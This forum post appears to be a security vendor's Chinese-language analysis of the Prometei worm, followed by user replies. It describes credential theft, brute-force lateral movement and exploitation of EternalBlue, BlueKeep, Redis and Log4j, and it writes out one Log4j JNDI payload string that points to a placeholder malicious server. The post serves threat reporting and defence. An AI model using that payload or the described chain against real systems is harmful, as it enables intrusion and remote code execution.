吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 11433|回复: 98
收起左侧

[PC样本分析] 政企机构用户注意!蠕虫病毒Prometei正在针对局域网横向渗透传播

   关闭 [复制链接]
火绒安全实验室 发表于 2022-2-16 17:06
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
近日,火绒安全实验室监测到蠕虫病毒“Prometei”正在全网传播。该病毒通过横向渗透攻击方式对局域网中的终端进行大面积入侵,并且可以跨平台(Window、Linux、macOS等系统)横向传播。火绒安全提醒广大用户,尤其是企业、政府部门、学校、医院等拥有大型局域网机构,及时做好排查与防护工作,避免受到该病毒影响。目前,火绒安全(个人版、企业版)产品已对该病毒进行拦截查杀。


根据火绒安全实验室溯源分析,该病毒入侵终端后,会通过远程服务器接收并执行病毒作者下发的各类指令,包括挖矿、更新病毒模块、下发新的病毒模块等恶意行为。除此之外,该病毒还会通过创建服务、注册表添加自启动等方式达到长期驻留用户终端的目的,并通过修改防火墙规则来削弱系统安全性,甚至不排除病毒作者通过后门指令对外网终端进行攻击的可能性。


病毒恶意行为执行流程

更为严重的是,该病毒在入侵终端后,还可以根据病毒作者下发的后门指令,对同一网段下的其它终端进行横向渗透攻击,造成更大的影响,威胁更多局域网用户。根据火绒安全实验室分析,病毒主要通过弱口令暴破和漏洞两种方式进行横向渗透,其中,病毒使用的漏洞包括“永恒之蓝”漏洞、Redis未授权访问漏洞、BlueKeep漏洞、Apache Log4j漏洞等常见高危漏洞。另外,该病毒目前依旧在更新中,不排除后续引入更多攻击方式进行横向渗透攻击的可能性。

C&C服务器地址

蠕虫病毒特点为不断复制自身,且可携带其它病毒模块,并“擅长”通过漏洞攻击或者横向渗透进行传播,从而大面积感染目标设备,是局域网中常见的一大威胁。

近年来,火绒安全也不断升级查杀和防护技术,从而有效阻止蠕虫病毒在局域网肆意传播的现象:如【远程登录防护】功能,可以有效抵挡病毒的RDP、SMB等暴破行为;【横向渗透防护】功能可以有效拦截病毒后续渗透入侵行为,做到阻断病毒在局域网内扩散,避免终端受到病毒的影响;【Web服务保护】、【网络入侵拦截】、【对外攻击拦截】则可以对上述服务漏洞、系统漏洞攻击进行及时拦截。

以下为本文所述蠕虫病毒“Prometei”详细分析与样本hash:


一、样本分析

Sqhost主模块
主模块在横向传播的过程中名为:zsvc.exe,使用UPX壳进行压缩,除此之外,病毒代码还对病毒主要代码逻辑入口进行了加密。该模块具有挖矿、下载文件、持久化、执行任意命令行、扩展模块、削弱系统安全性、调用横向传播模块等恶意行为,当该病毒接收到C&C服务器下发的后门指令后,即会执行相应恶意行为。该病毒可以通过匿名通讯协议与C&C服务器进行通讯,如Tor(洋葱路由器),从而增强了实际C&C服务器的隐蔽性。Windows病毒样本支持的后门指令,如下图所示:

Windows病毒样本支持的后门指令

该病毒模块可以根据不同命令行参数执行对应功能,具体功能模式,如下图所示:

参数功能

较为典型的后门功能指令代码call
调用CreateProcess函数执行程序,相关代码,如下图所示:

CALL指令代码

update
从服务器下载更新主模块,相关代码,如下图所示:
update指令代码

wget
根据URL下载文件,相关代码,如下图所示:

wget指令代码

通过执行命令行的方式下载其他模块
病毒接收到后门指令后,会通过命令行执行PowerShell脚本,下载、解压含有恶意文件的压缩包(updata.7z),执行解压后的install.cmd。脚本内容,如下图所示:
PowerShell指令
压缩包内容,如下图所示:
压缩包内容
执行install.cmd,更新现有模块,并且执行rdpcIip横向传播模块,如下图所示:
install.cmd内容


RdpCIip横向传播模块

RdpCIip横向传播模块会对局域网内所有的机器进行扫描,如:SMB、Redis、RPC、RDP、Apache、SSH、SQL Server、PostgreSQL服务端口,针对上述服务进行暴破攻击以及漏洞攻击(“永恒之蓝”、BlueKeep、ApacheLog4j 漏洞、Redis未经授权访问漏洞等),拥有大型局域网的政企机构面临较大的安全风险。在局域网暴破之前会通过miwalk模块(Mimikatz)获取系统登录凭证,通过获取的登录凭证和自带弱口令字典进行横向暴破攻击。攻击成功之后,被攻击主机会执行一段恶意代码。恶意代码会调用PowerShell命令,从服务器下载主模块并执行,相关代码,如下图所示:
恶意代码内容

暴破传播
病毒会对局域网内存在SMB、WMI、SQLServer、PostgreSQL服务的机器进行暴破攻击。病毒暴破所使用的密码字典内容包括:miwalk模块(Mimikatz)获取的系统登录凭证、病毒镜像中的弱口令字典和根据目标主机名动态生成一组字典,以此方式提高暴破攻击的成功率。
收集系统登录凭证
调用miwalk模块(Mimikatz)获取系统登录凭证,保存在ssldata2.dll中。相关代码,如下图所示:
调用miwalk获取系统登录凭证

动态生成字典
该病毒镜像中包含的弱口令字典,如下图所示:
该病毒镜像中包含的弱口令字典

根据目标主机名动态生成的登录信息字典,如下图所示:
根据目标主机名动态组合的登录信息字典

WMI暴破传播
根据登录信息字典暴破WMI,通过WMI远程执行CMD指令进行横向传播。相关代码,如下图所示:
WMI暴破传播


SSH暴破传播
把生成的字典加密写入到.cpass文件中,调用windrlver模块对SSH进行暴破攻击、横向传播。 相关代码,如下图所示:

SSH暴破传播
常见的账号和密码组合
加密后的登录信息字典保存在cpass文件中

调用windrlver模块,传入目标信息作为参数,对目标进行暴破传播, 如下图所示:
调用windrlver模块

windrlver模块
该模块的主要目的是根据提供的登录信息字典对目标SSH进行暴破攻击、横向传播。相关代码,如下图所示:
SSH暴破传播
SQLServer和PostgreSQL暴破传播
前面的步骤和SSH暴破传播相同,最后调用nethelper模块,如下图所示:
调用nethelper模块
NetHelper模块
该模块的主要目的是根据提供的字典对目标SQL Server和PostgreSQL数据库进行暴破攻击、横向传播。
SQL Server暴破传播
连接数据库代码,如下图所示:
连接SQL Server
调用PowerShell指令在目标终端下载主模块,如下图所示:
远程执行PowerShell
PostgreSQL暴破传播
连接数据库代码,如下图所示:
连接PostgreSQL
根据不同的操作系统在目标中下载不同的主模块,Windows系统使用PowerShell指令下载模块,相关代码,如下图所示:
Windows
类Unix系统(mac OS、Linux)的使用curl/wget/nexec下载模块,相关代码,如下图所示:
类Unix系统
SMB暴破
首先根据之前获取到的系统登录凭证和弱口令字典进行SMB暴破攻击,如果暴破攻击失败会使用“永恒之蓝”漏洞攻击。攻击成功之后,会远程创建随机名服务项(如下图服务项名为xsvf),通过服务执行CMD指令,从服务器下载执行sqhost.exe(后门模块),具体流程,如下图所示:
SMB认证
远程创建服务
受害者主机被攻击后添加的服务项
漏洞传播
病毒会对局域网内存在漏洞的机器进行漏洞攻击,如:“永恒之蓝”漏洞、Redis未授权访问漏洞、BlueKeep漏洞、Apache Log4j漏洞。


永恒之蓝”漏洞传播
如果SMB暴破攻击失败,会使用“永恒之蓝”漏洞攻击,攻击成功后的传播流程与暴破攻击后续传播流程相同,如上所述(SMB暴破)。相关防御情况,如下图所示:
火绒拦截该病毒产生的“永恒之蓝”攻击

Redis未授权访问漏洞传播
Redis未授权访问漏洞,Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行设置相关的安全策略,比如添加防火墙规则避免其他非信任来源IP 访问等,这样会将 Redis 服务暴露到公网上。如果没有设置密码认证,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。通过Redis未授权访问漏洞连接成功后,将通过wget指令下载恶意模块并执行,相关代码,如下图所示:
Redis传播流程

BlueKeep漏洞传播
根据RDP协议获取目标主机名,将目标IP和主机名加密传给bklocal(BlueKeep漏洞攻击模块)对目标进行漏洞传播。获取RDP协议中返回的主机名, 相关代码,如下图所示:
获取RDP协议中返回的主机名

将目标IP和主机名加密,如下图所示:
对主机名和目标IP进行加密

调用bklocal模块传入加密后的数据,如下图所示:
加密后的内容传入bklocal模块

ApacheLog4j漏洞传播
使用Apache Log4j 漏洞(CVE-2021-44228)执行远程代码,构造User-Agent的内容为${jndi:ldap://恶意服务器IP:1399/test},向目标80或者8080端口发送get请求,如果存在ApacheLog4j漏洞就会执行恶意服务器上test文件中的恶意代码进行传播,相关代码,如下图所示:
ApacheLog4j漏洞

类Unix系统病毒样本分析
类Unix系统病毒样本暂时仅发现SMB、SSH、Redis漏洞攻击和暴破攻击,且代码逻辑部分和Windows相同,将不再进行叙述。
类Unix系统病毒样本支持的后门指令,如下图所示:
类Unix系统病毒样本支持的后门指令


二、附录
样本hash:

免费评分

参与人数 64吾爱币 +57 热心值 +56 收起 理由
xiaoyin2021 + 1 我很赞同!
Hony06 + 1 热心回复!
zxy少女欣 + 1 + 1 热心回复!
wuyanzu001 + 1 + 1 用心讨论,共获提升!
wangchenghu98 + 1 用心讨论,共获提升!
panghan + 1 + 1 谢谢@Thanks!
927QvQ + 1 + 1 用心讨论,共获提升!
xiaoxiangzhu233 + 1 + 1 细心!
Nickie + 1 + 1 我很赞同!
H15100423 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
ZSY1206 + 1 + 1 我很赞同!
saikikusoo + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
r061225 + 1 + 1 谢谢@Thanks!
Lucky8663 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
lxlmogu + 1 + 1 谢谢@Thanks!
tk532666 + 1 + 1 热心回复!
JinxBoy + 1 看不懂
hackysh + 1 我很赞同!
蒋天 + 1 + 1 谢谢@Thanks!
rox + 1 + 1 谢谢@Thanks!
我是好淫 + 1 + 1 谢谢@Thanks!
xie270112107 + 1 + 1 热心回复!
Jomonny + 1 + 1 我很赞同!
金馆长2号 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
zxq1010117 + 1 热心回复!
Darklayi + 1 用心讨论,共获提升!
葫芦哥哥 + 1 谢谢@Thanks!
xianyuamiao123 + 1 + 1 谢谢@Thanks!
红楼一梦 + 1 + 1 分析的很专业很全面
炽日夕辉 + 2 + 1 热心回复!
wcf202835 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
极地企鹅 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
得不到的在骚动 + 1 用心讨论,共获提升!
total678 + 1 + 1 热心回复!
skyvicky + 1 + 1 请收下我的膝盖,我完全看不懂
李杨 + 1 + 1 支持一下
醉看红尘 + 1 谢谢@Thanks!
sunyx816 + 1 用心讨论,共获提升!
林优秀 + 1 + 1 热心回复!
azqdtf1 + 1 + 1 我很赞同!
钱男友 + 1 + 1 谢谢@Thanks!
By锺意 + 1 + 1 我很赞同!
可曾 + 1 + 1 我很赞同!
zero呆 + 1 + 1 用心讨论,共获提升!
kasha999 + 1 + 1 学习了,收完再看。
风冯讽凤 + 2 + 1 火绒niub
小飞? + 1 + 1 谢谢@Thanks!
Rammsteincccp + 1 + 1 谢谢@Thanks!
Amor + 1 + 1 我很赞同!
七月风 + 1 + 1 用心讨论,共获提升!
hepmeet70 + 1 + 1 我很赞同!
nshark + 1 + 1 谢谢@Thanks!
巡山的小旋风 + 1 + 1 热心回复!
ZZF1949 + 1 + 1 我很赞同!
gzsklsskszngc + 1 + 1 我很赞同!
5151diy + 1 + 1 我很赞同!
RainH + 1 热心回复!
nightmare77 + 1 + 1 我很赞同!
KuTangGu + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
wuaiwxh + 1 热心回复!
孤独尽头是自由 + 1 + 1 我很赞同!
侃遍天下无二人 + 1 + 1 热心回复!
landscapes + 1 + 1 我很赞同!
一只小凡凡 + 1 我很赞同!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

BigBack 发表于 2022-3-26 19:50
谢谢!不过说实话写病毒的还是高手,也就只有高手才能解开,像我这种普通用户只能加强防护了
a794921417 发表于 2022-2-16 18:21
songjing 发表于 2022-2-16 18:21
dongzi0712 发表于 2022-2-16 18:30
支持!!
n92738 发表于 2022-2-16 18:38
感谢楼主分享
xuka 发表于 2022-2-16 18:45
好牛好牛
landscapes 发表于 2022-2-16 18:49
用火绒我放心
myq12366 发表于 2022-2-16 19:10
感谢我绒
不懂破解 发表于 2022-2-16 19:14
支持火绒,警惕危险病毒!
孤独尽头是自由 发表于 2022-2-16 19:21
66666666666666
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 11:56

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表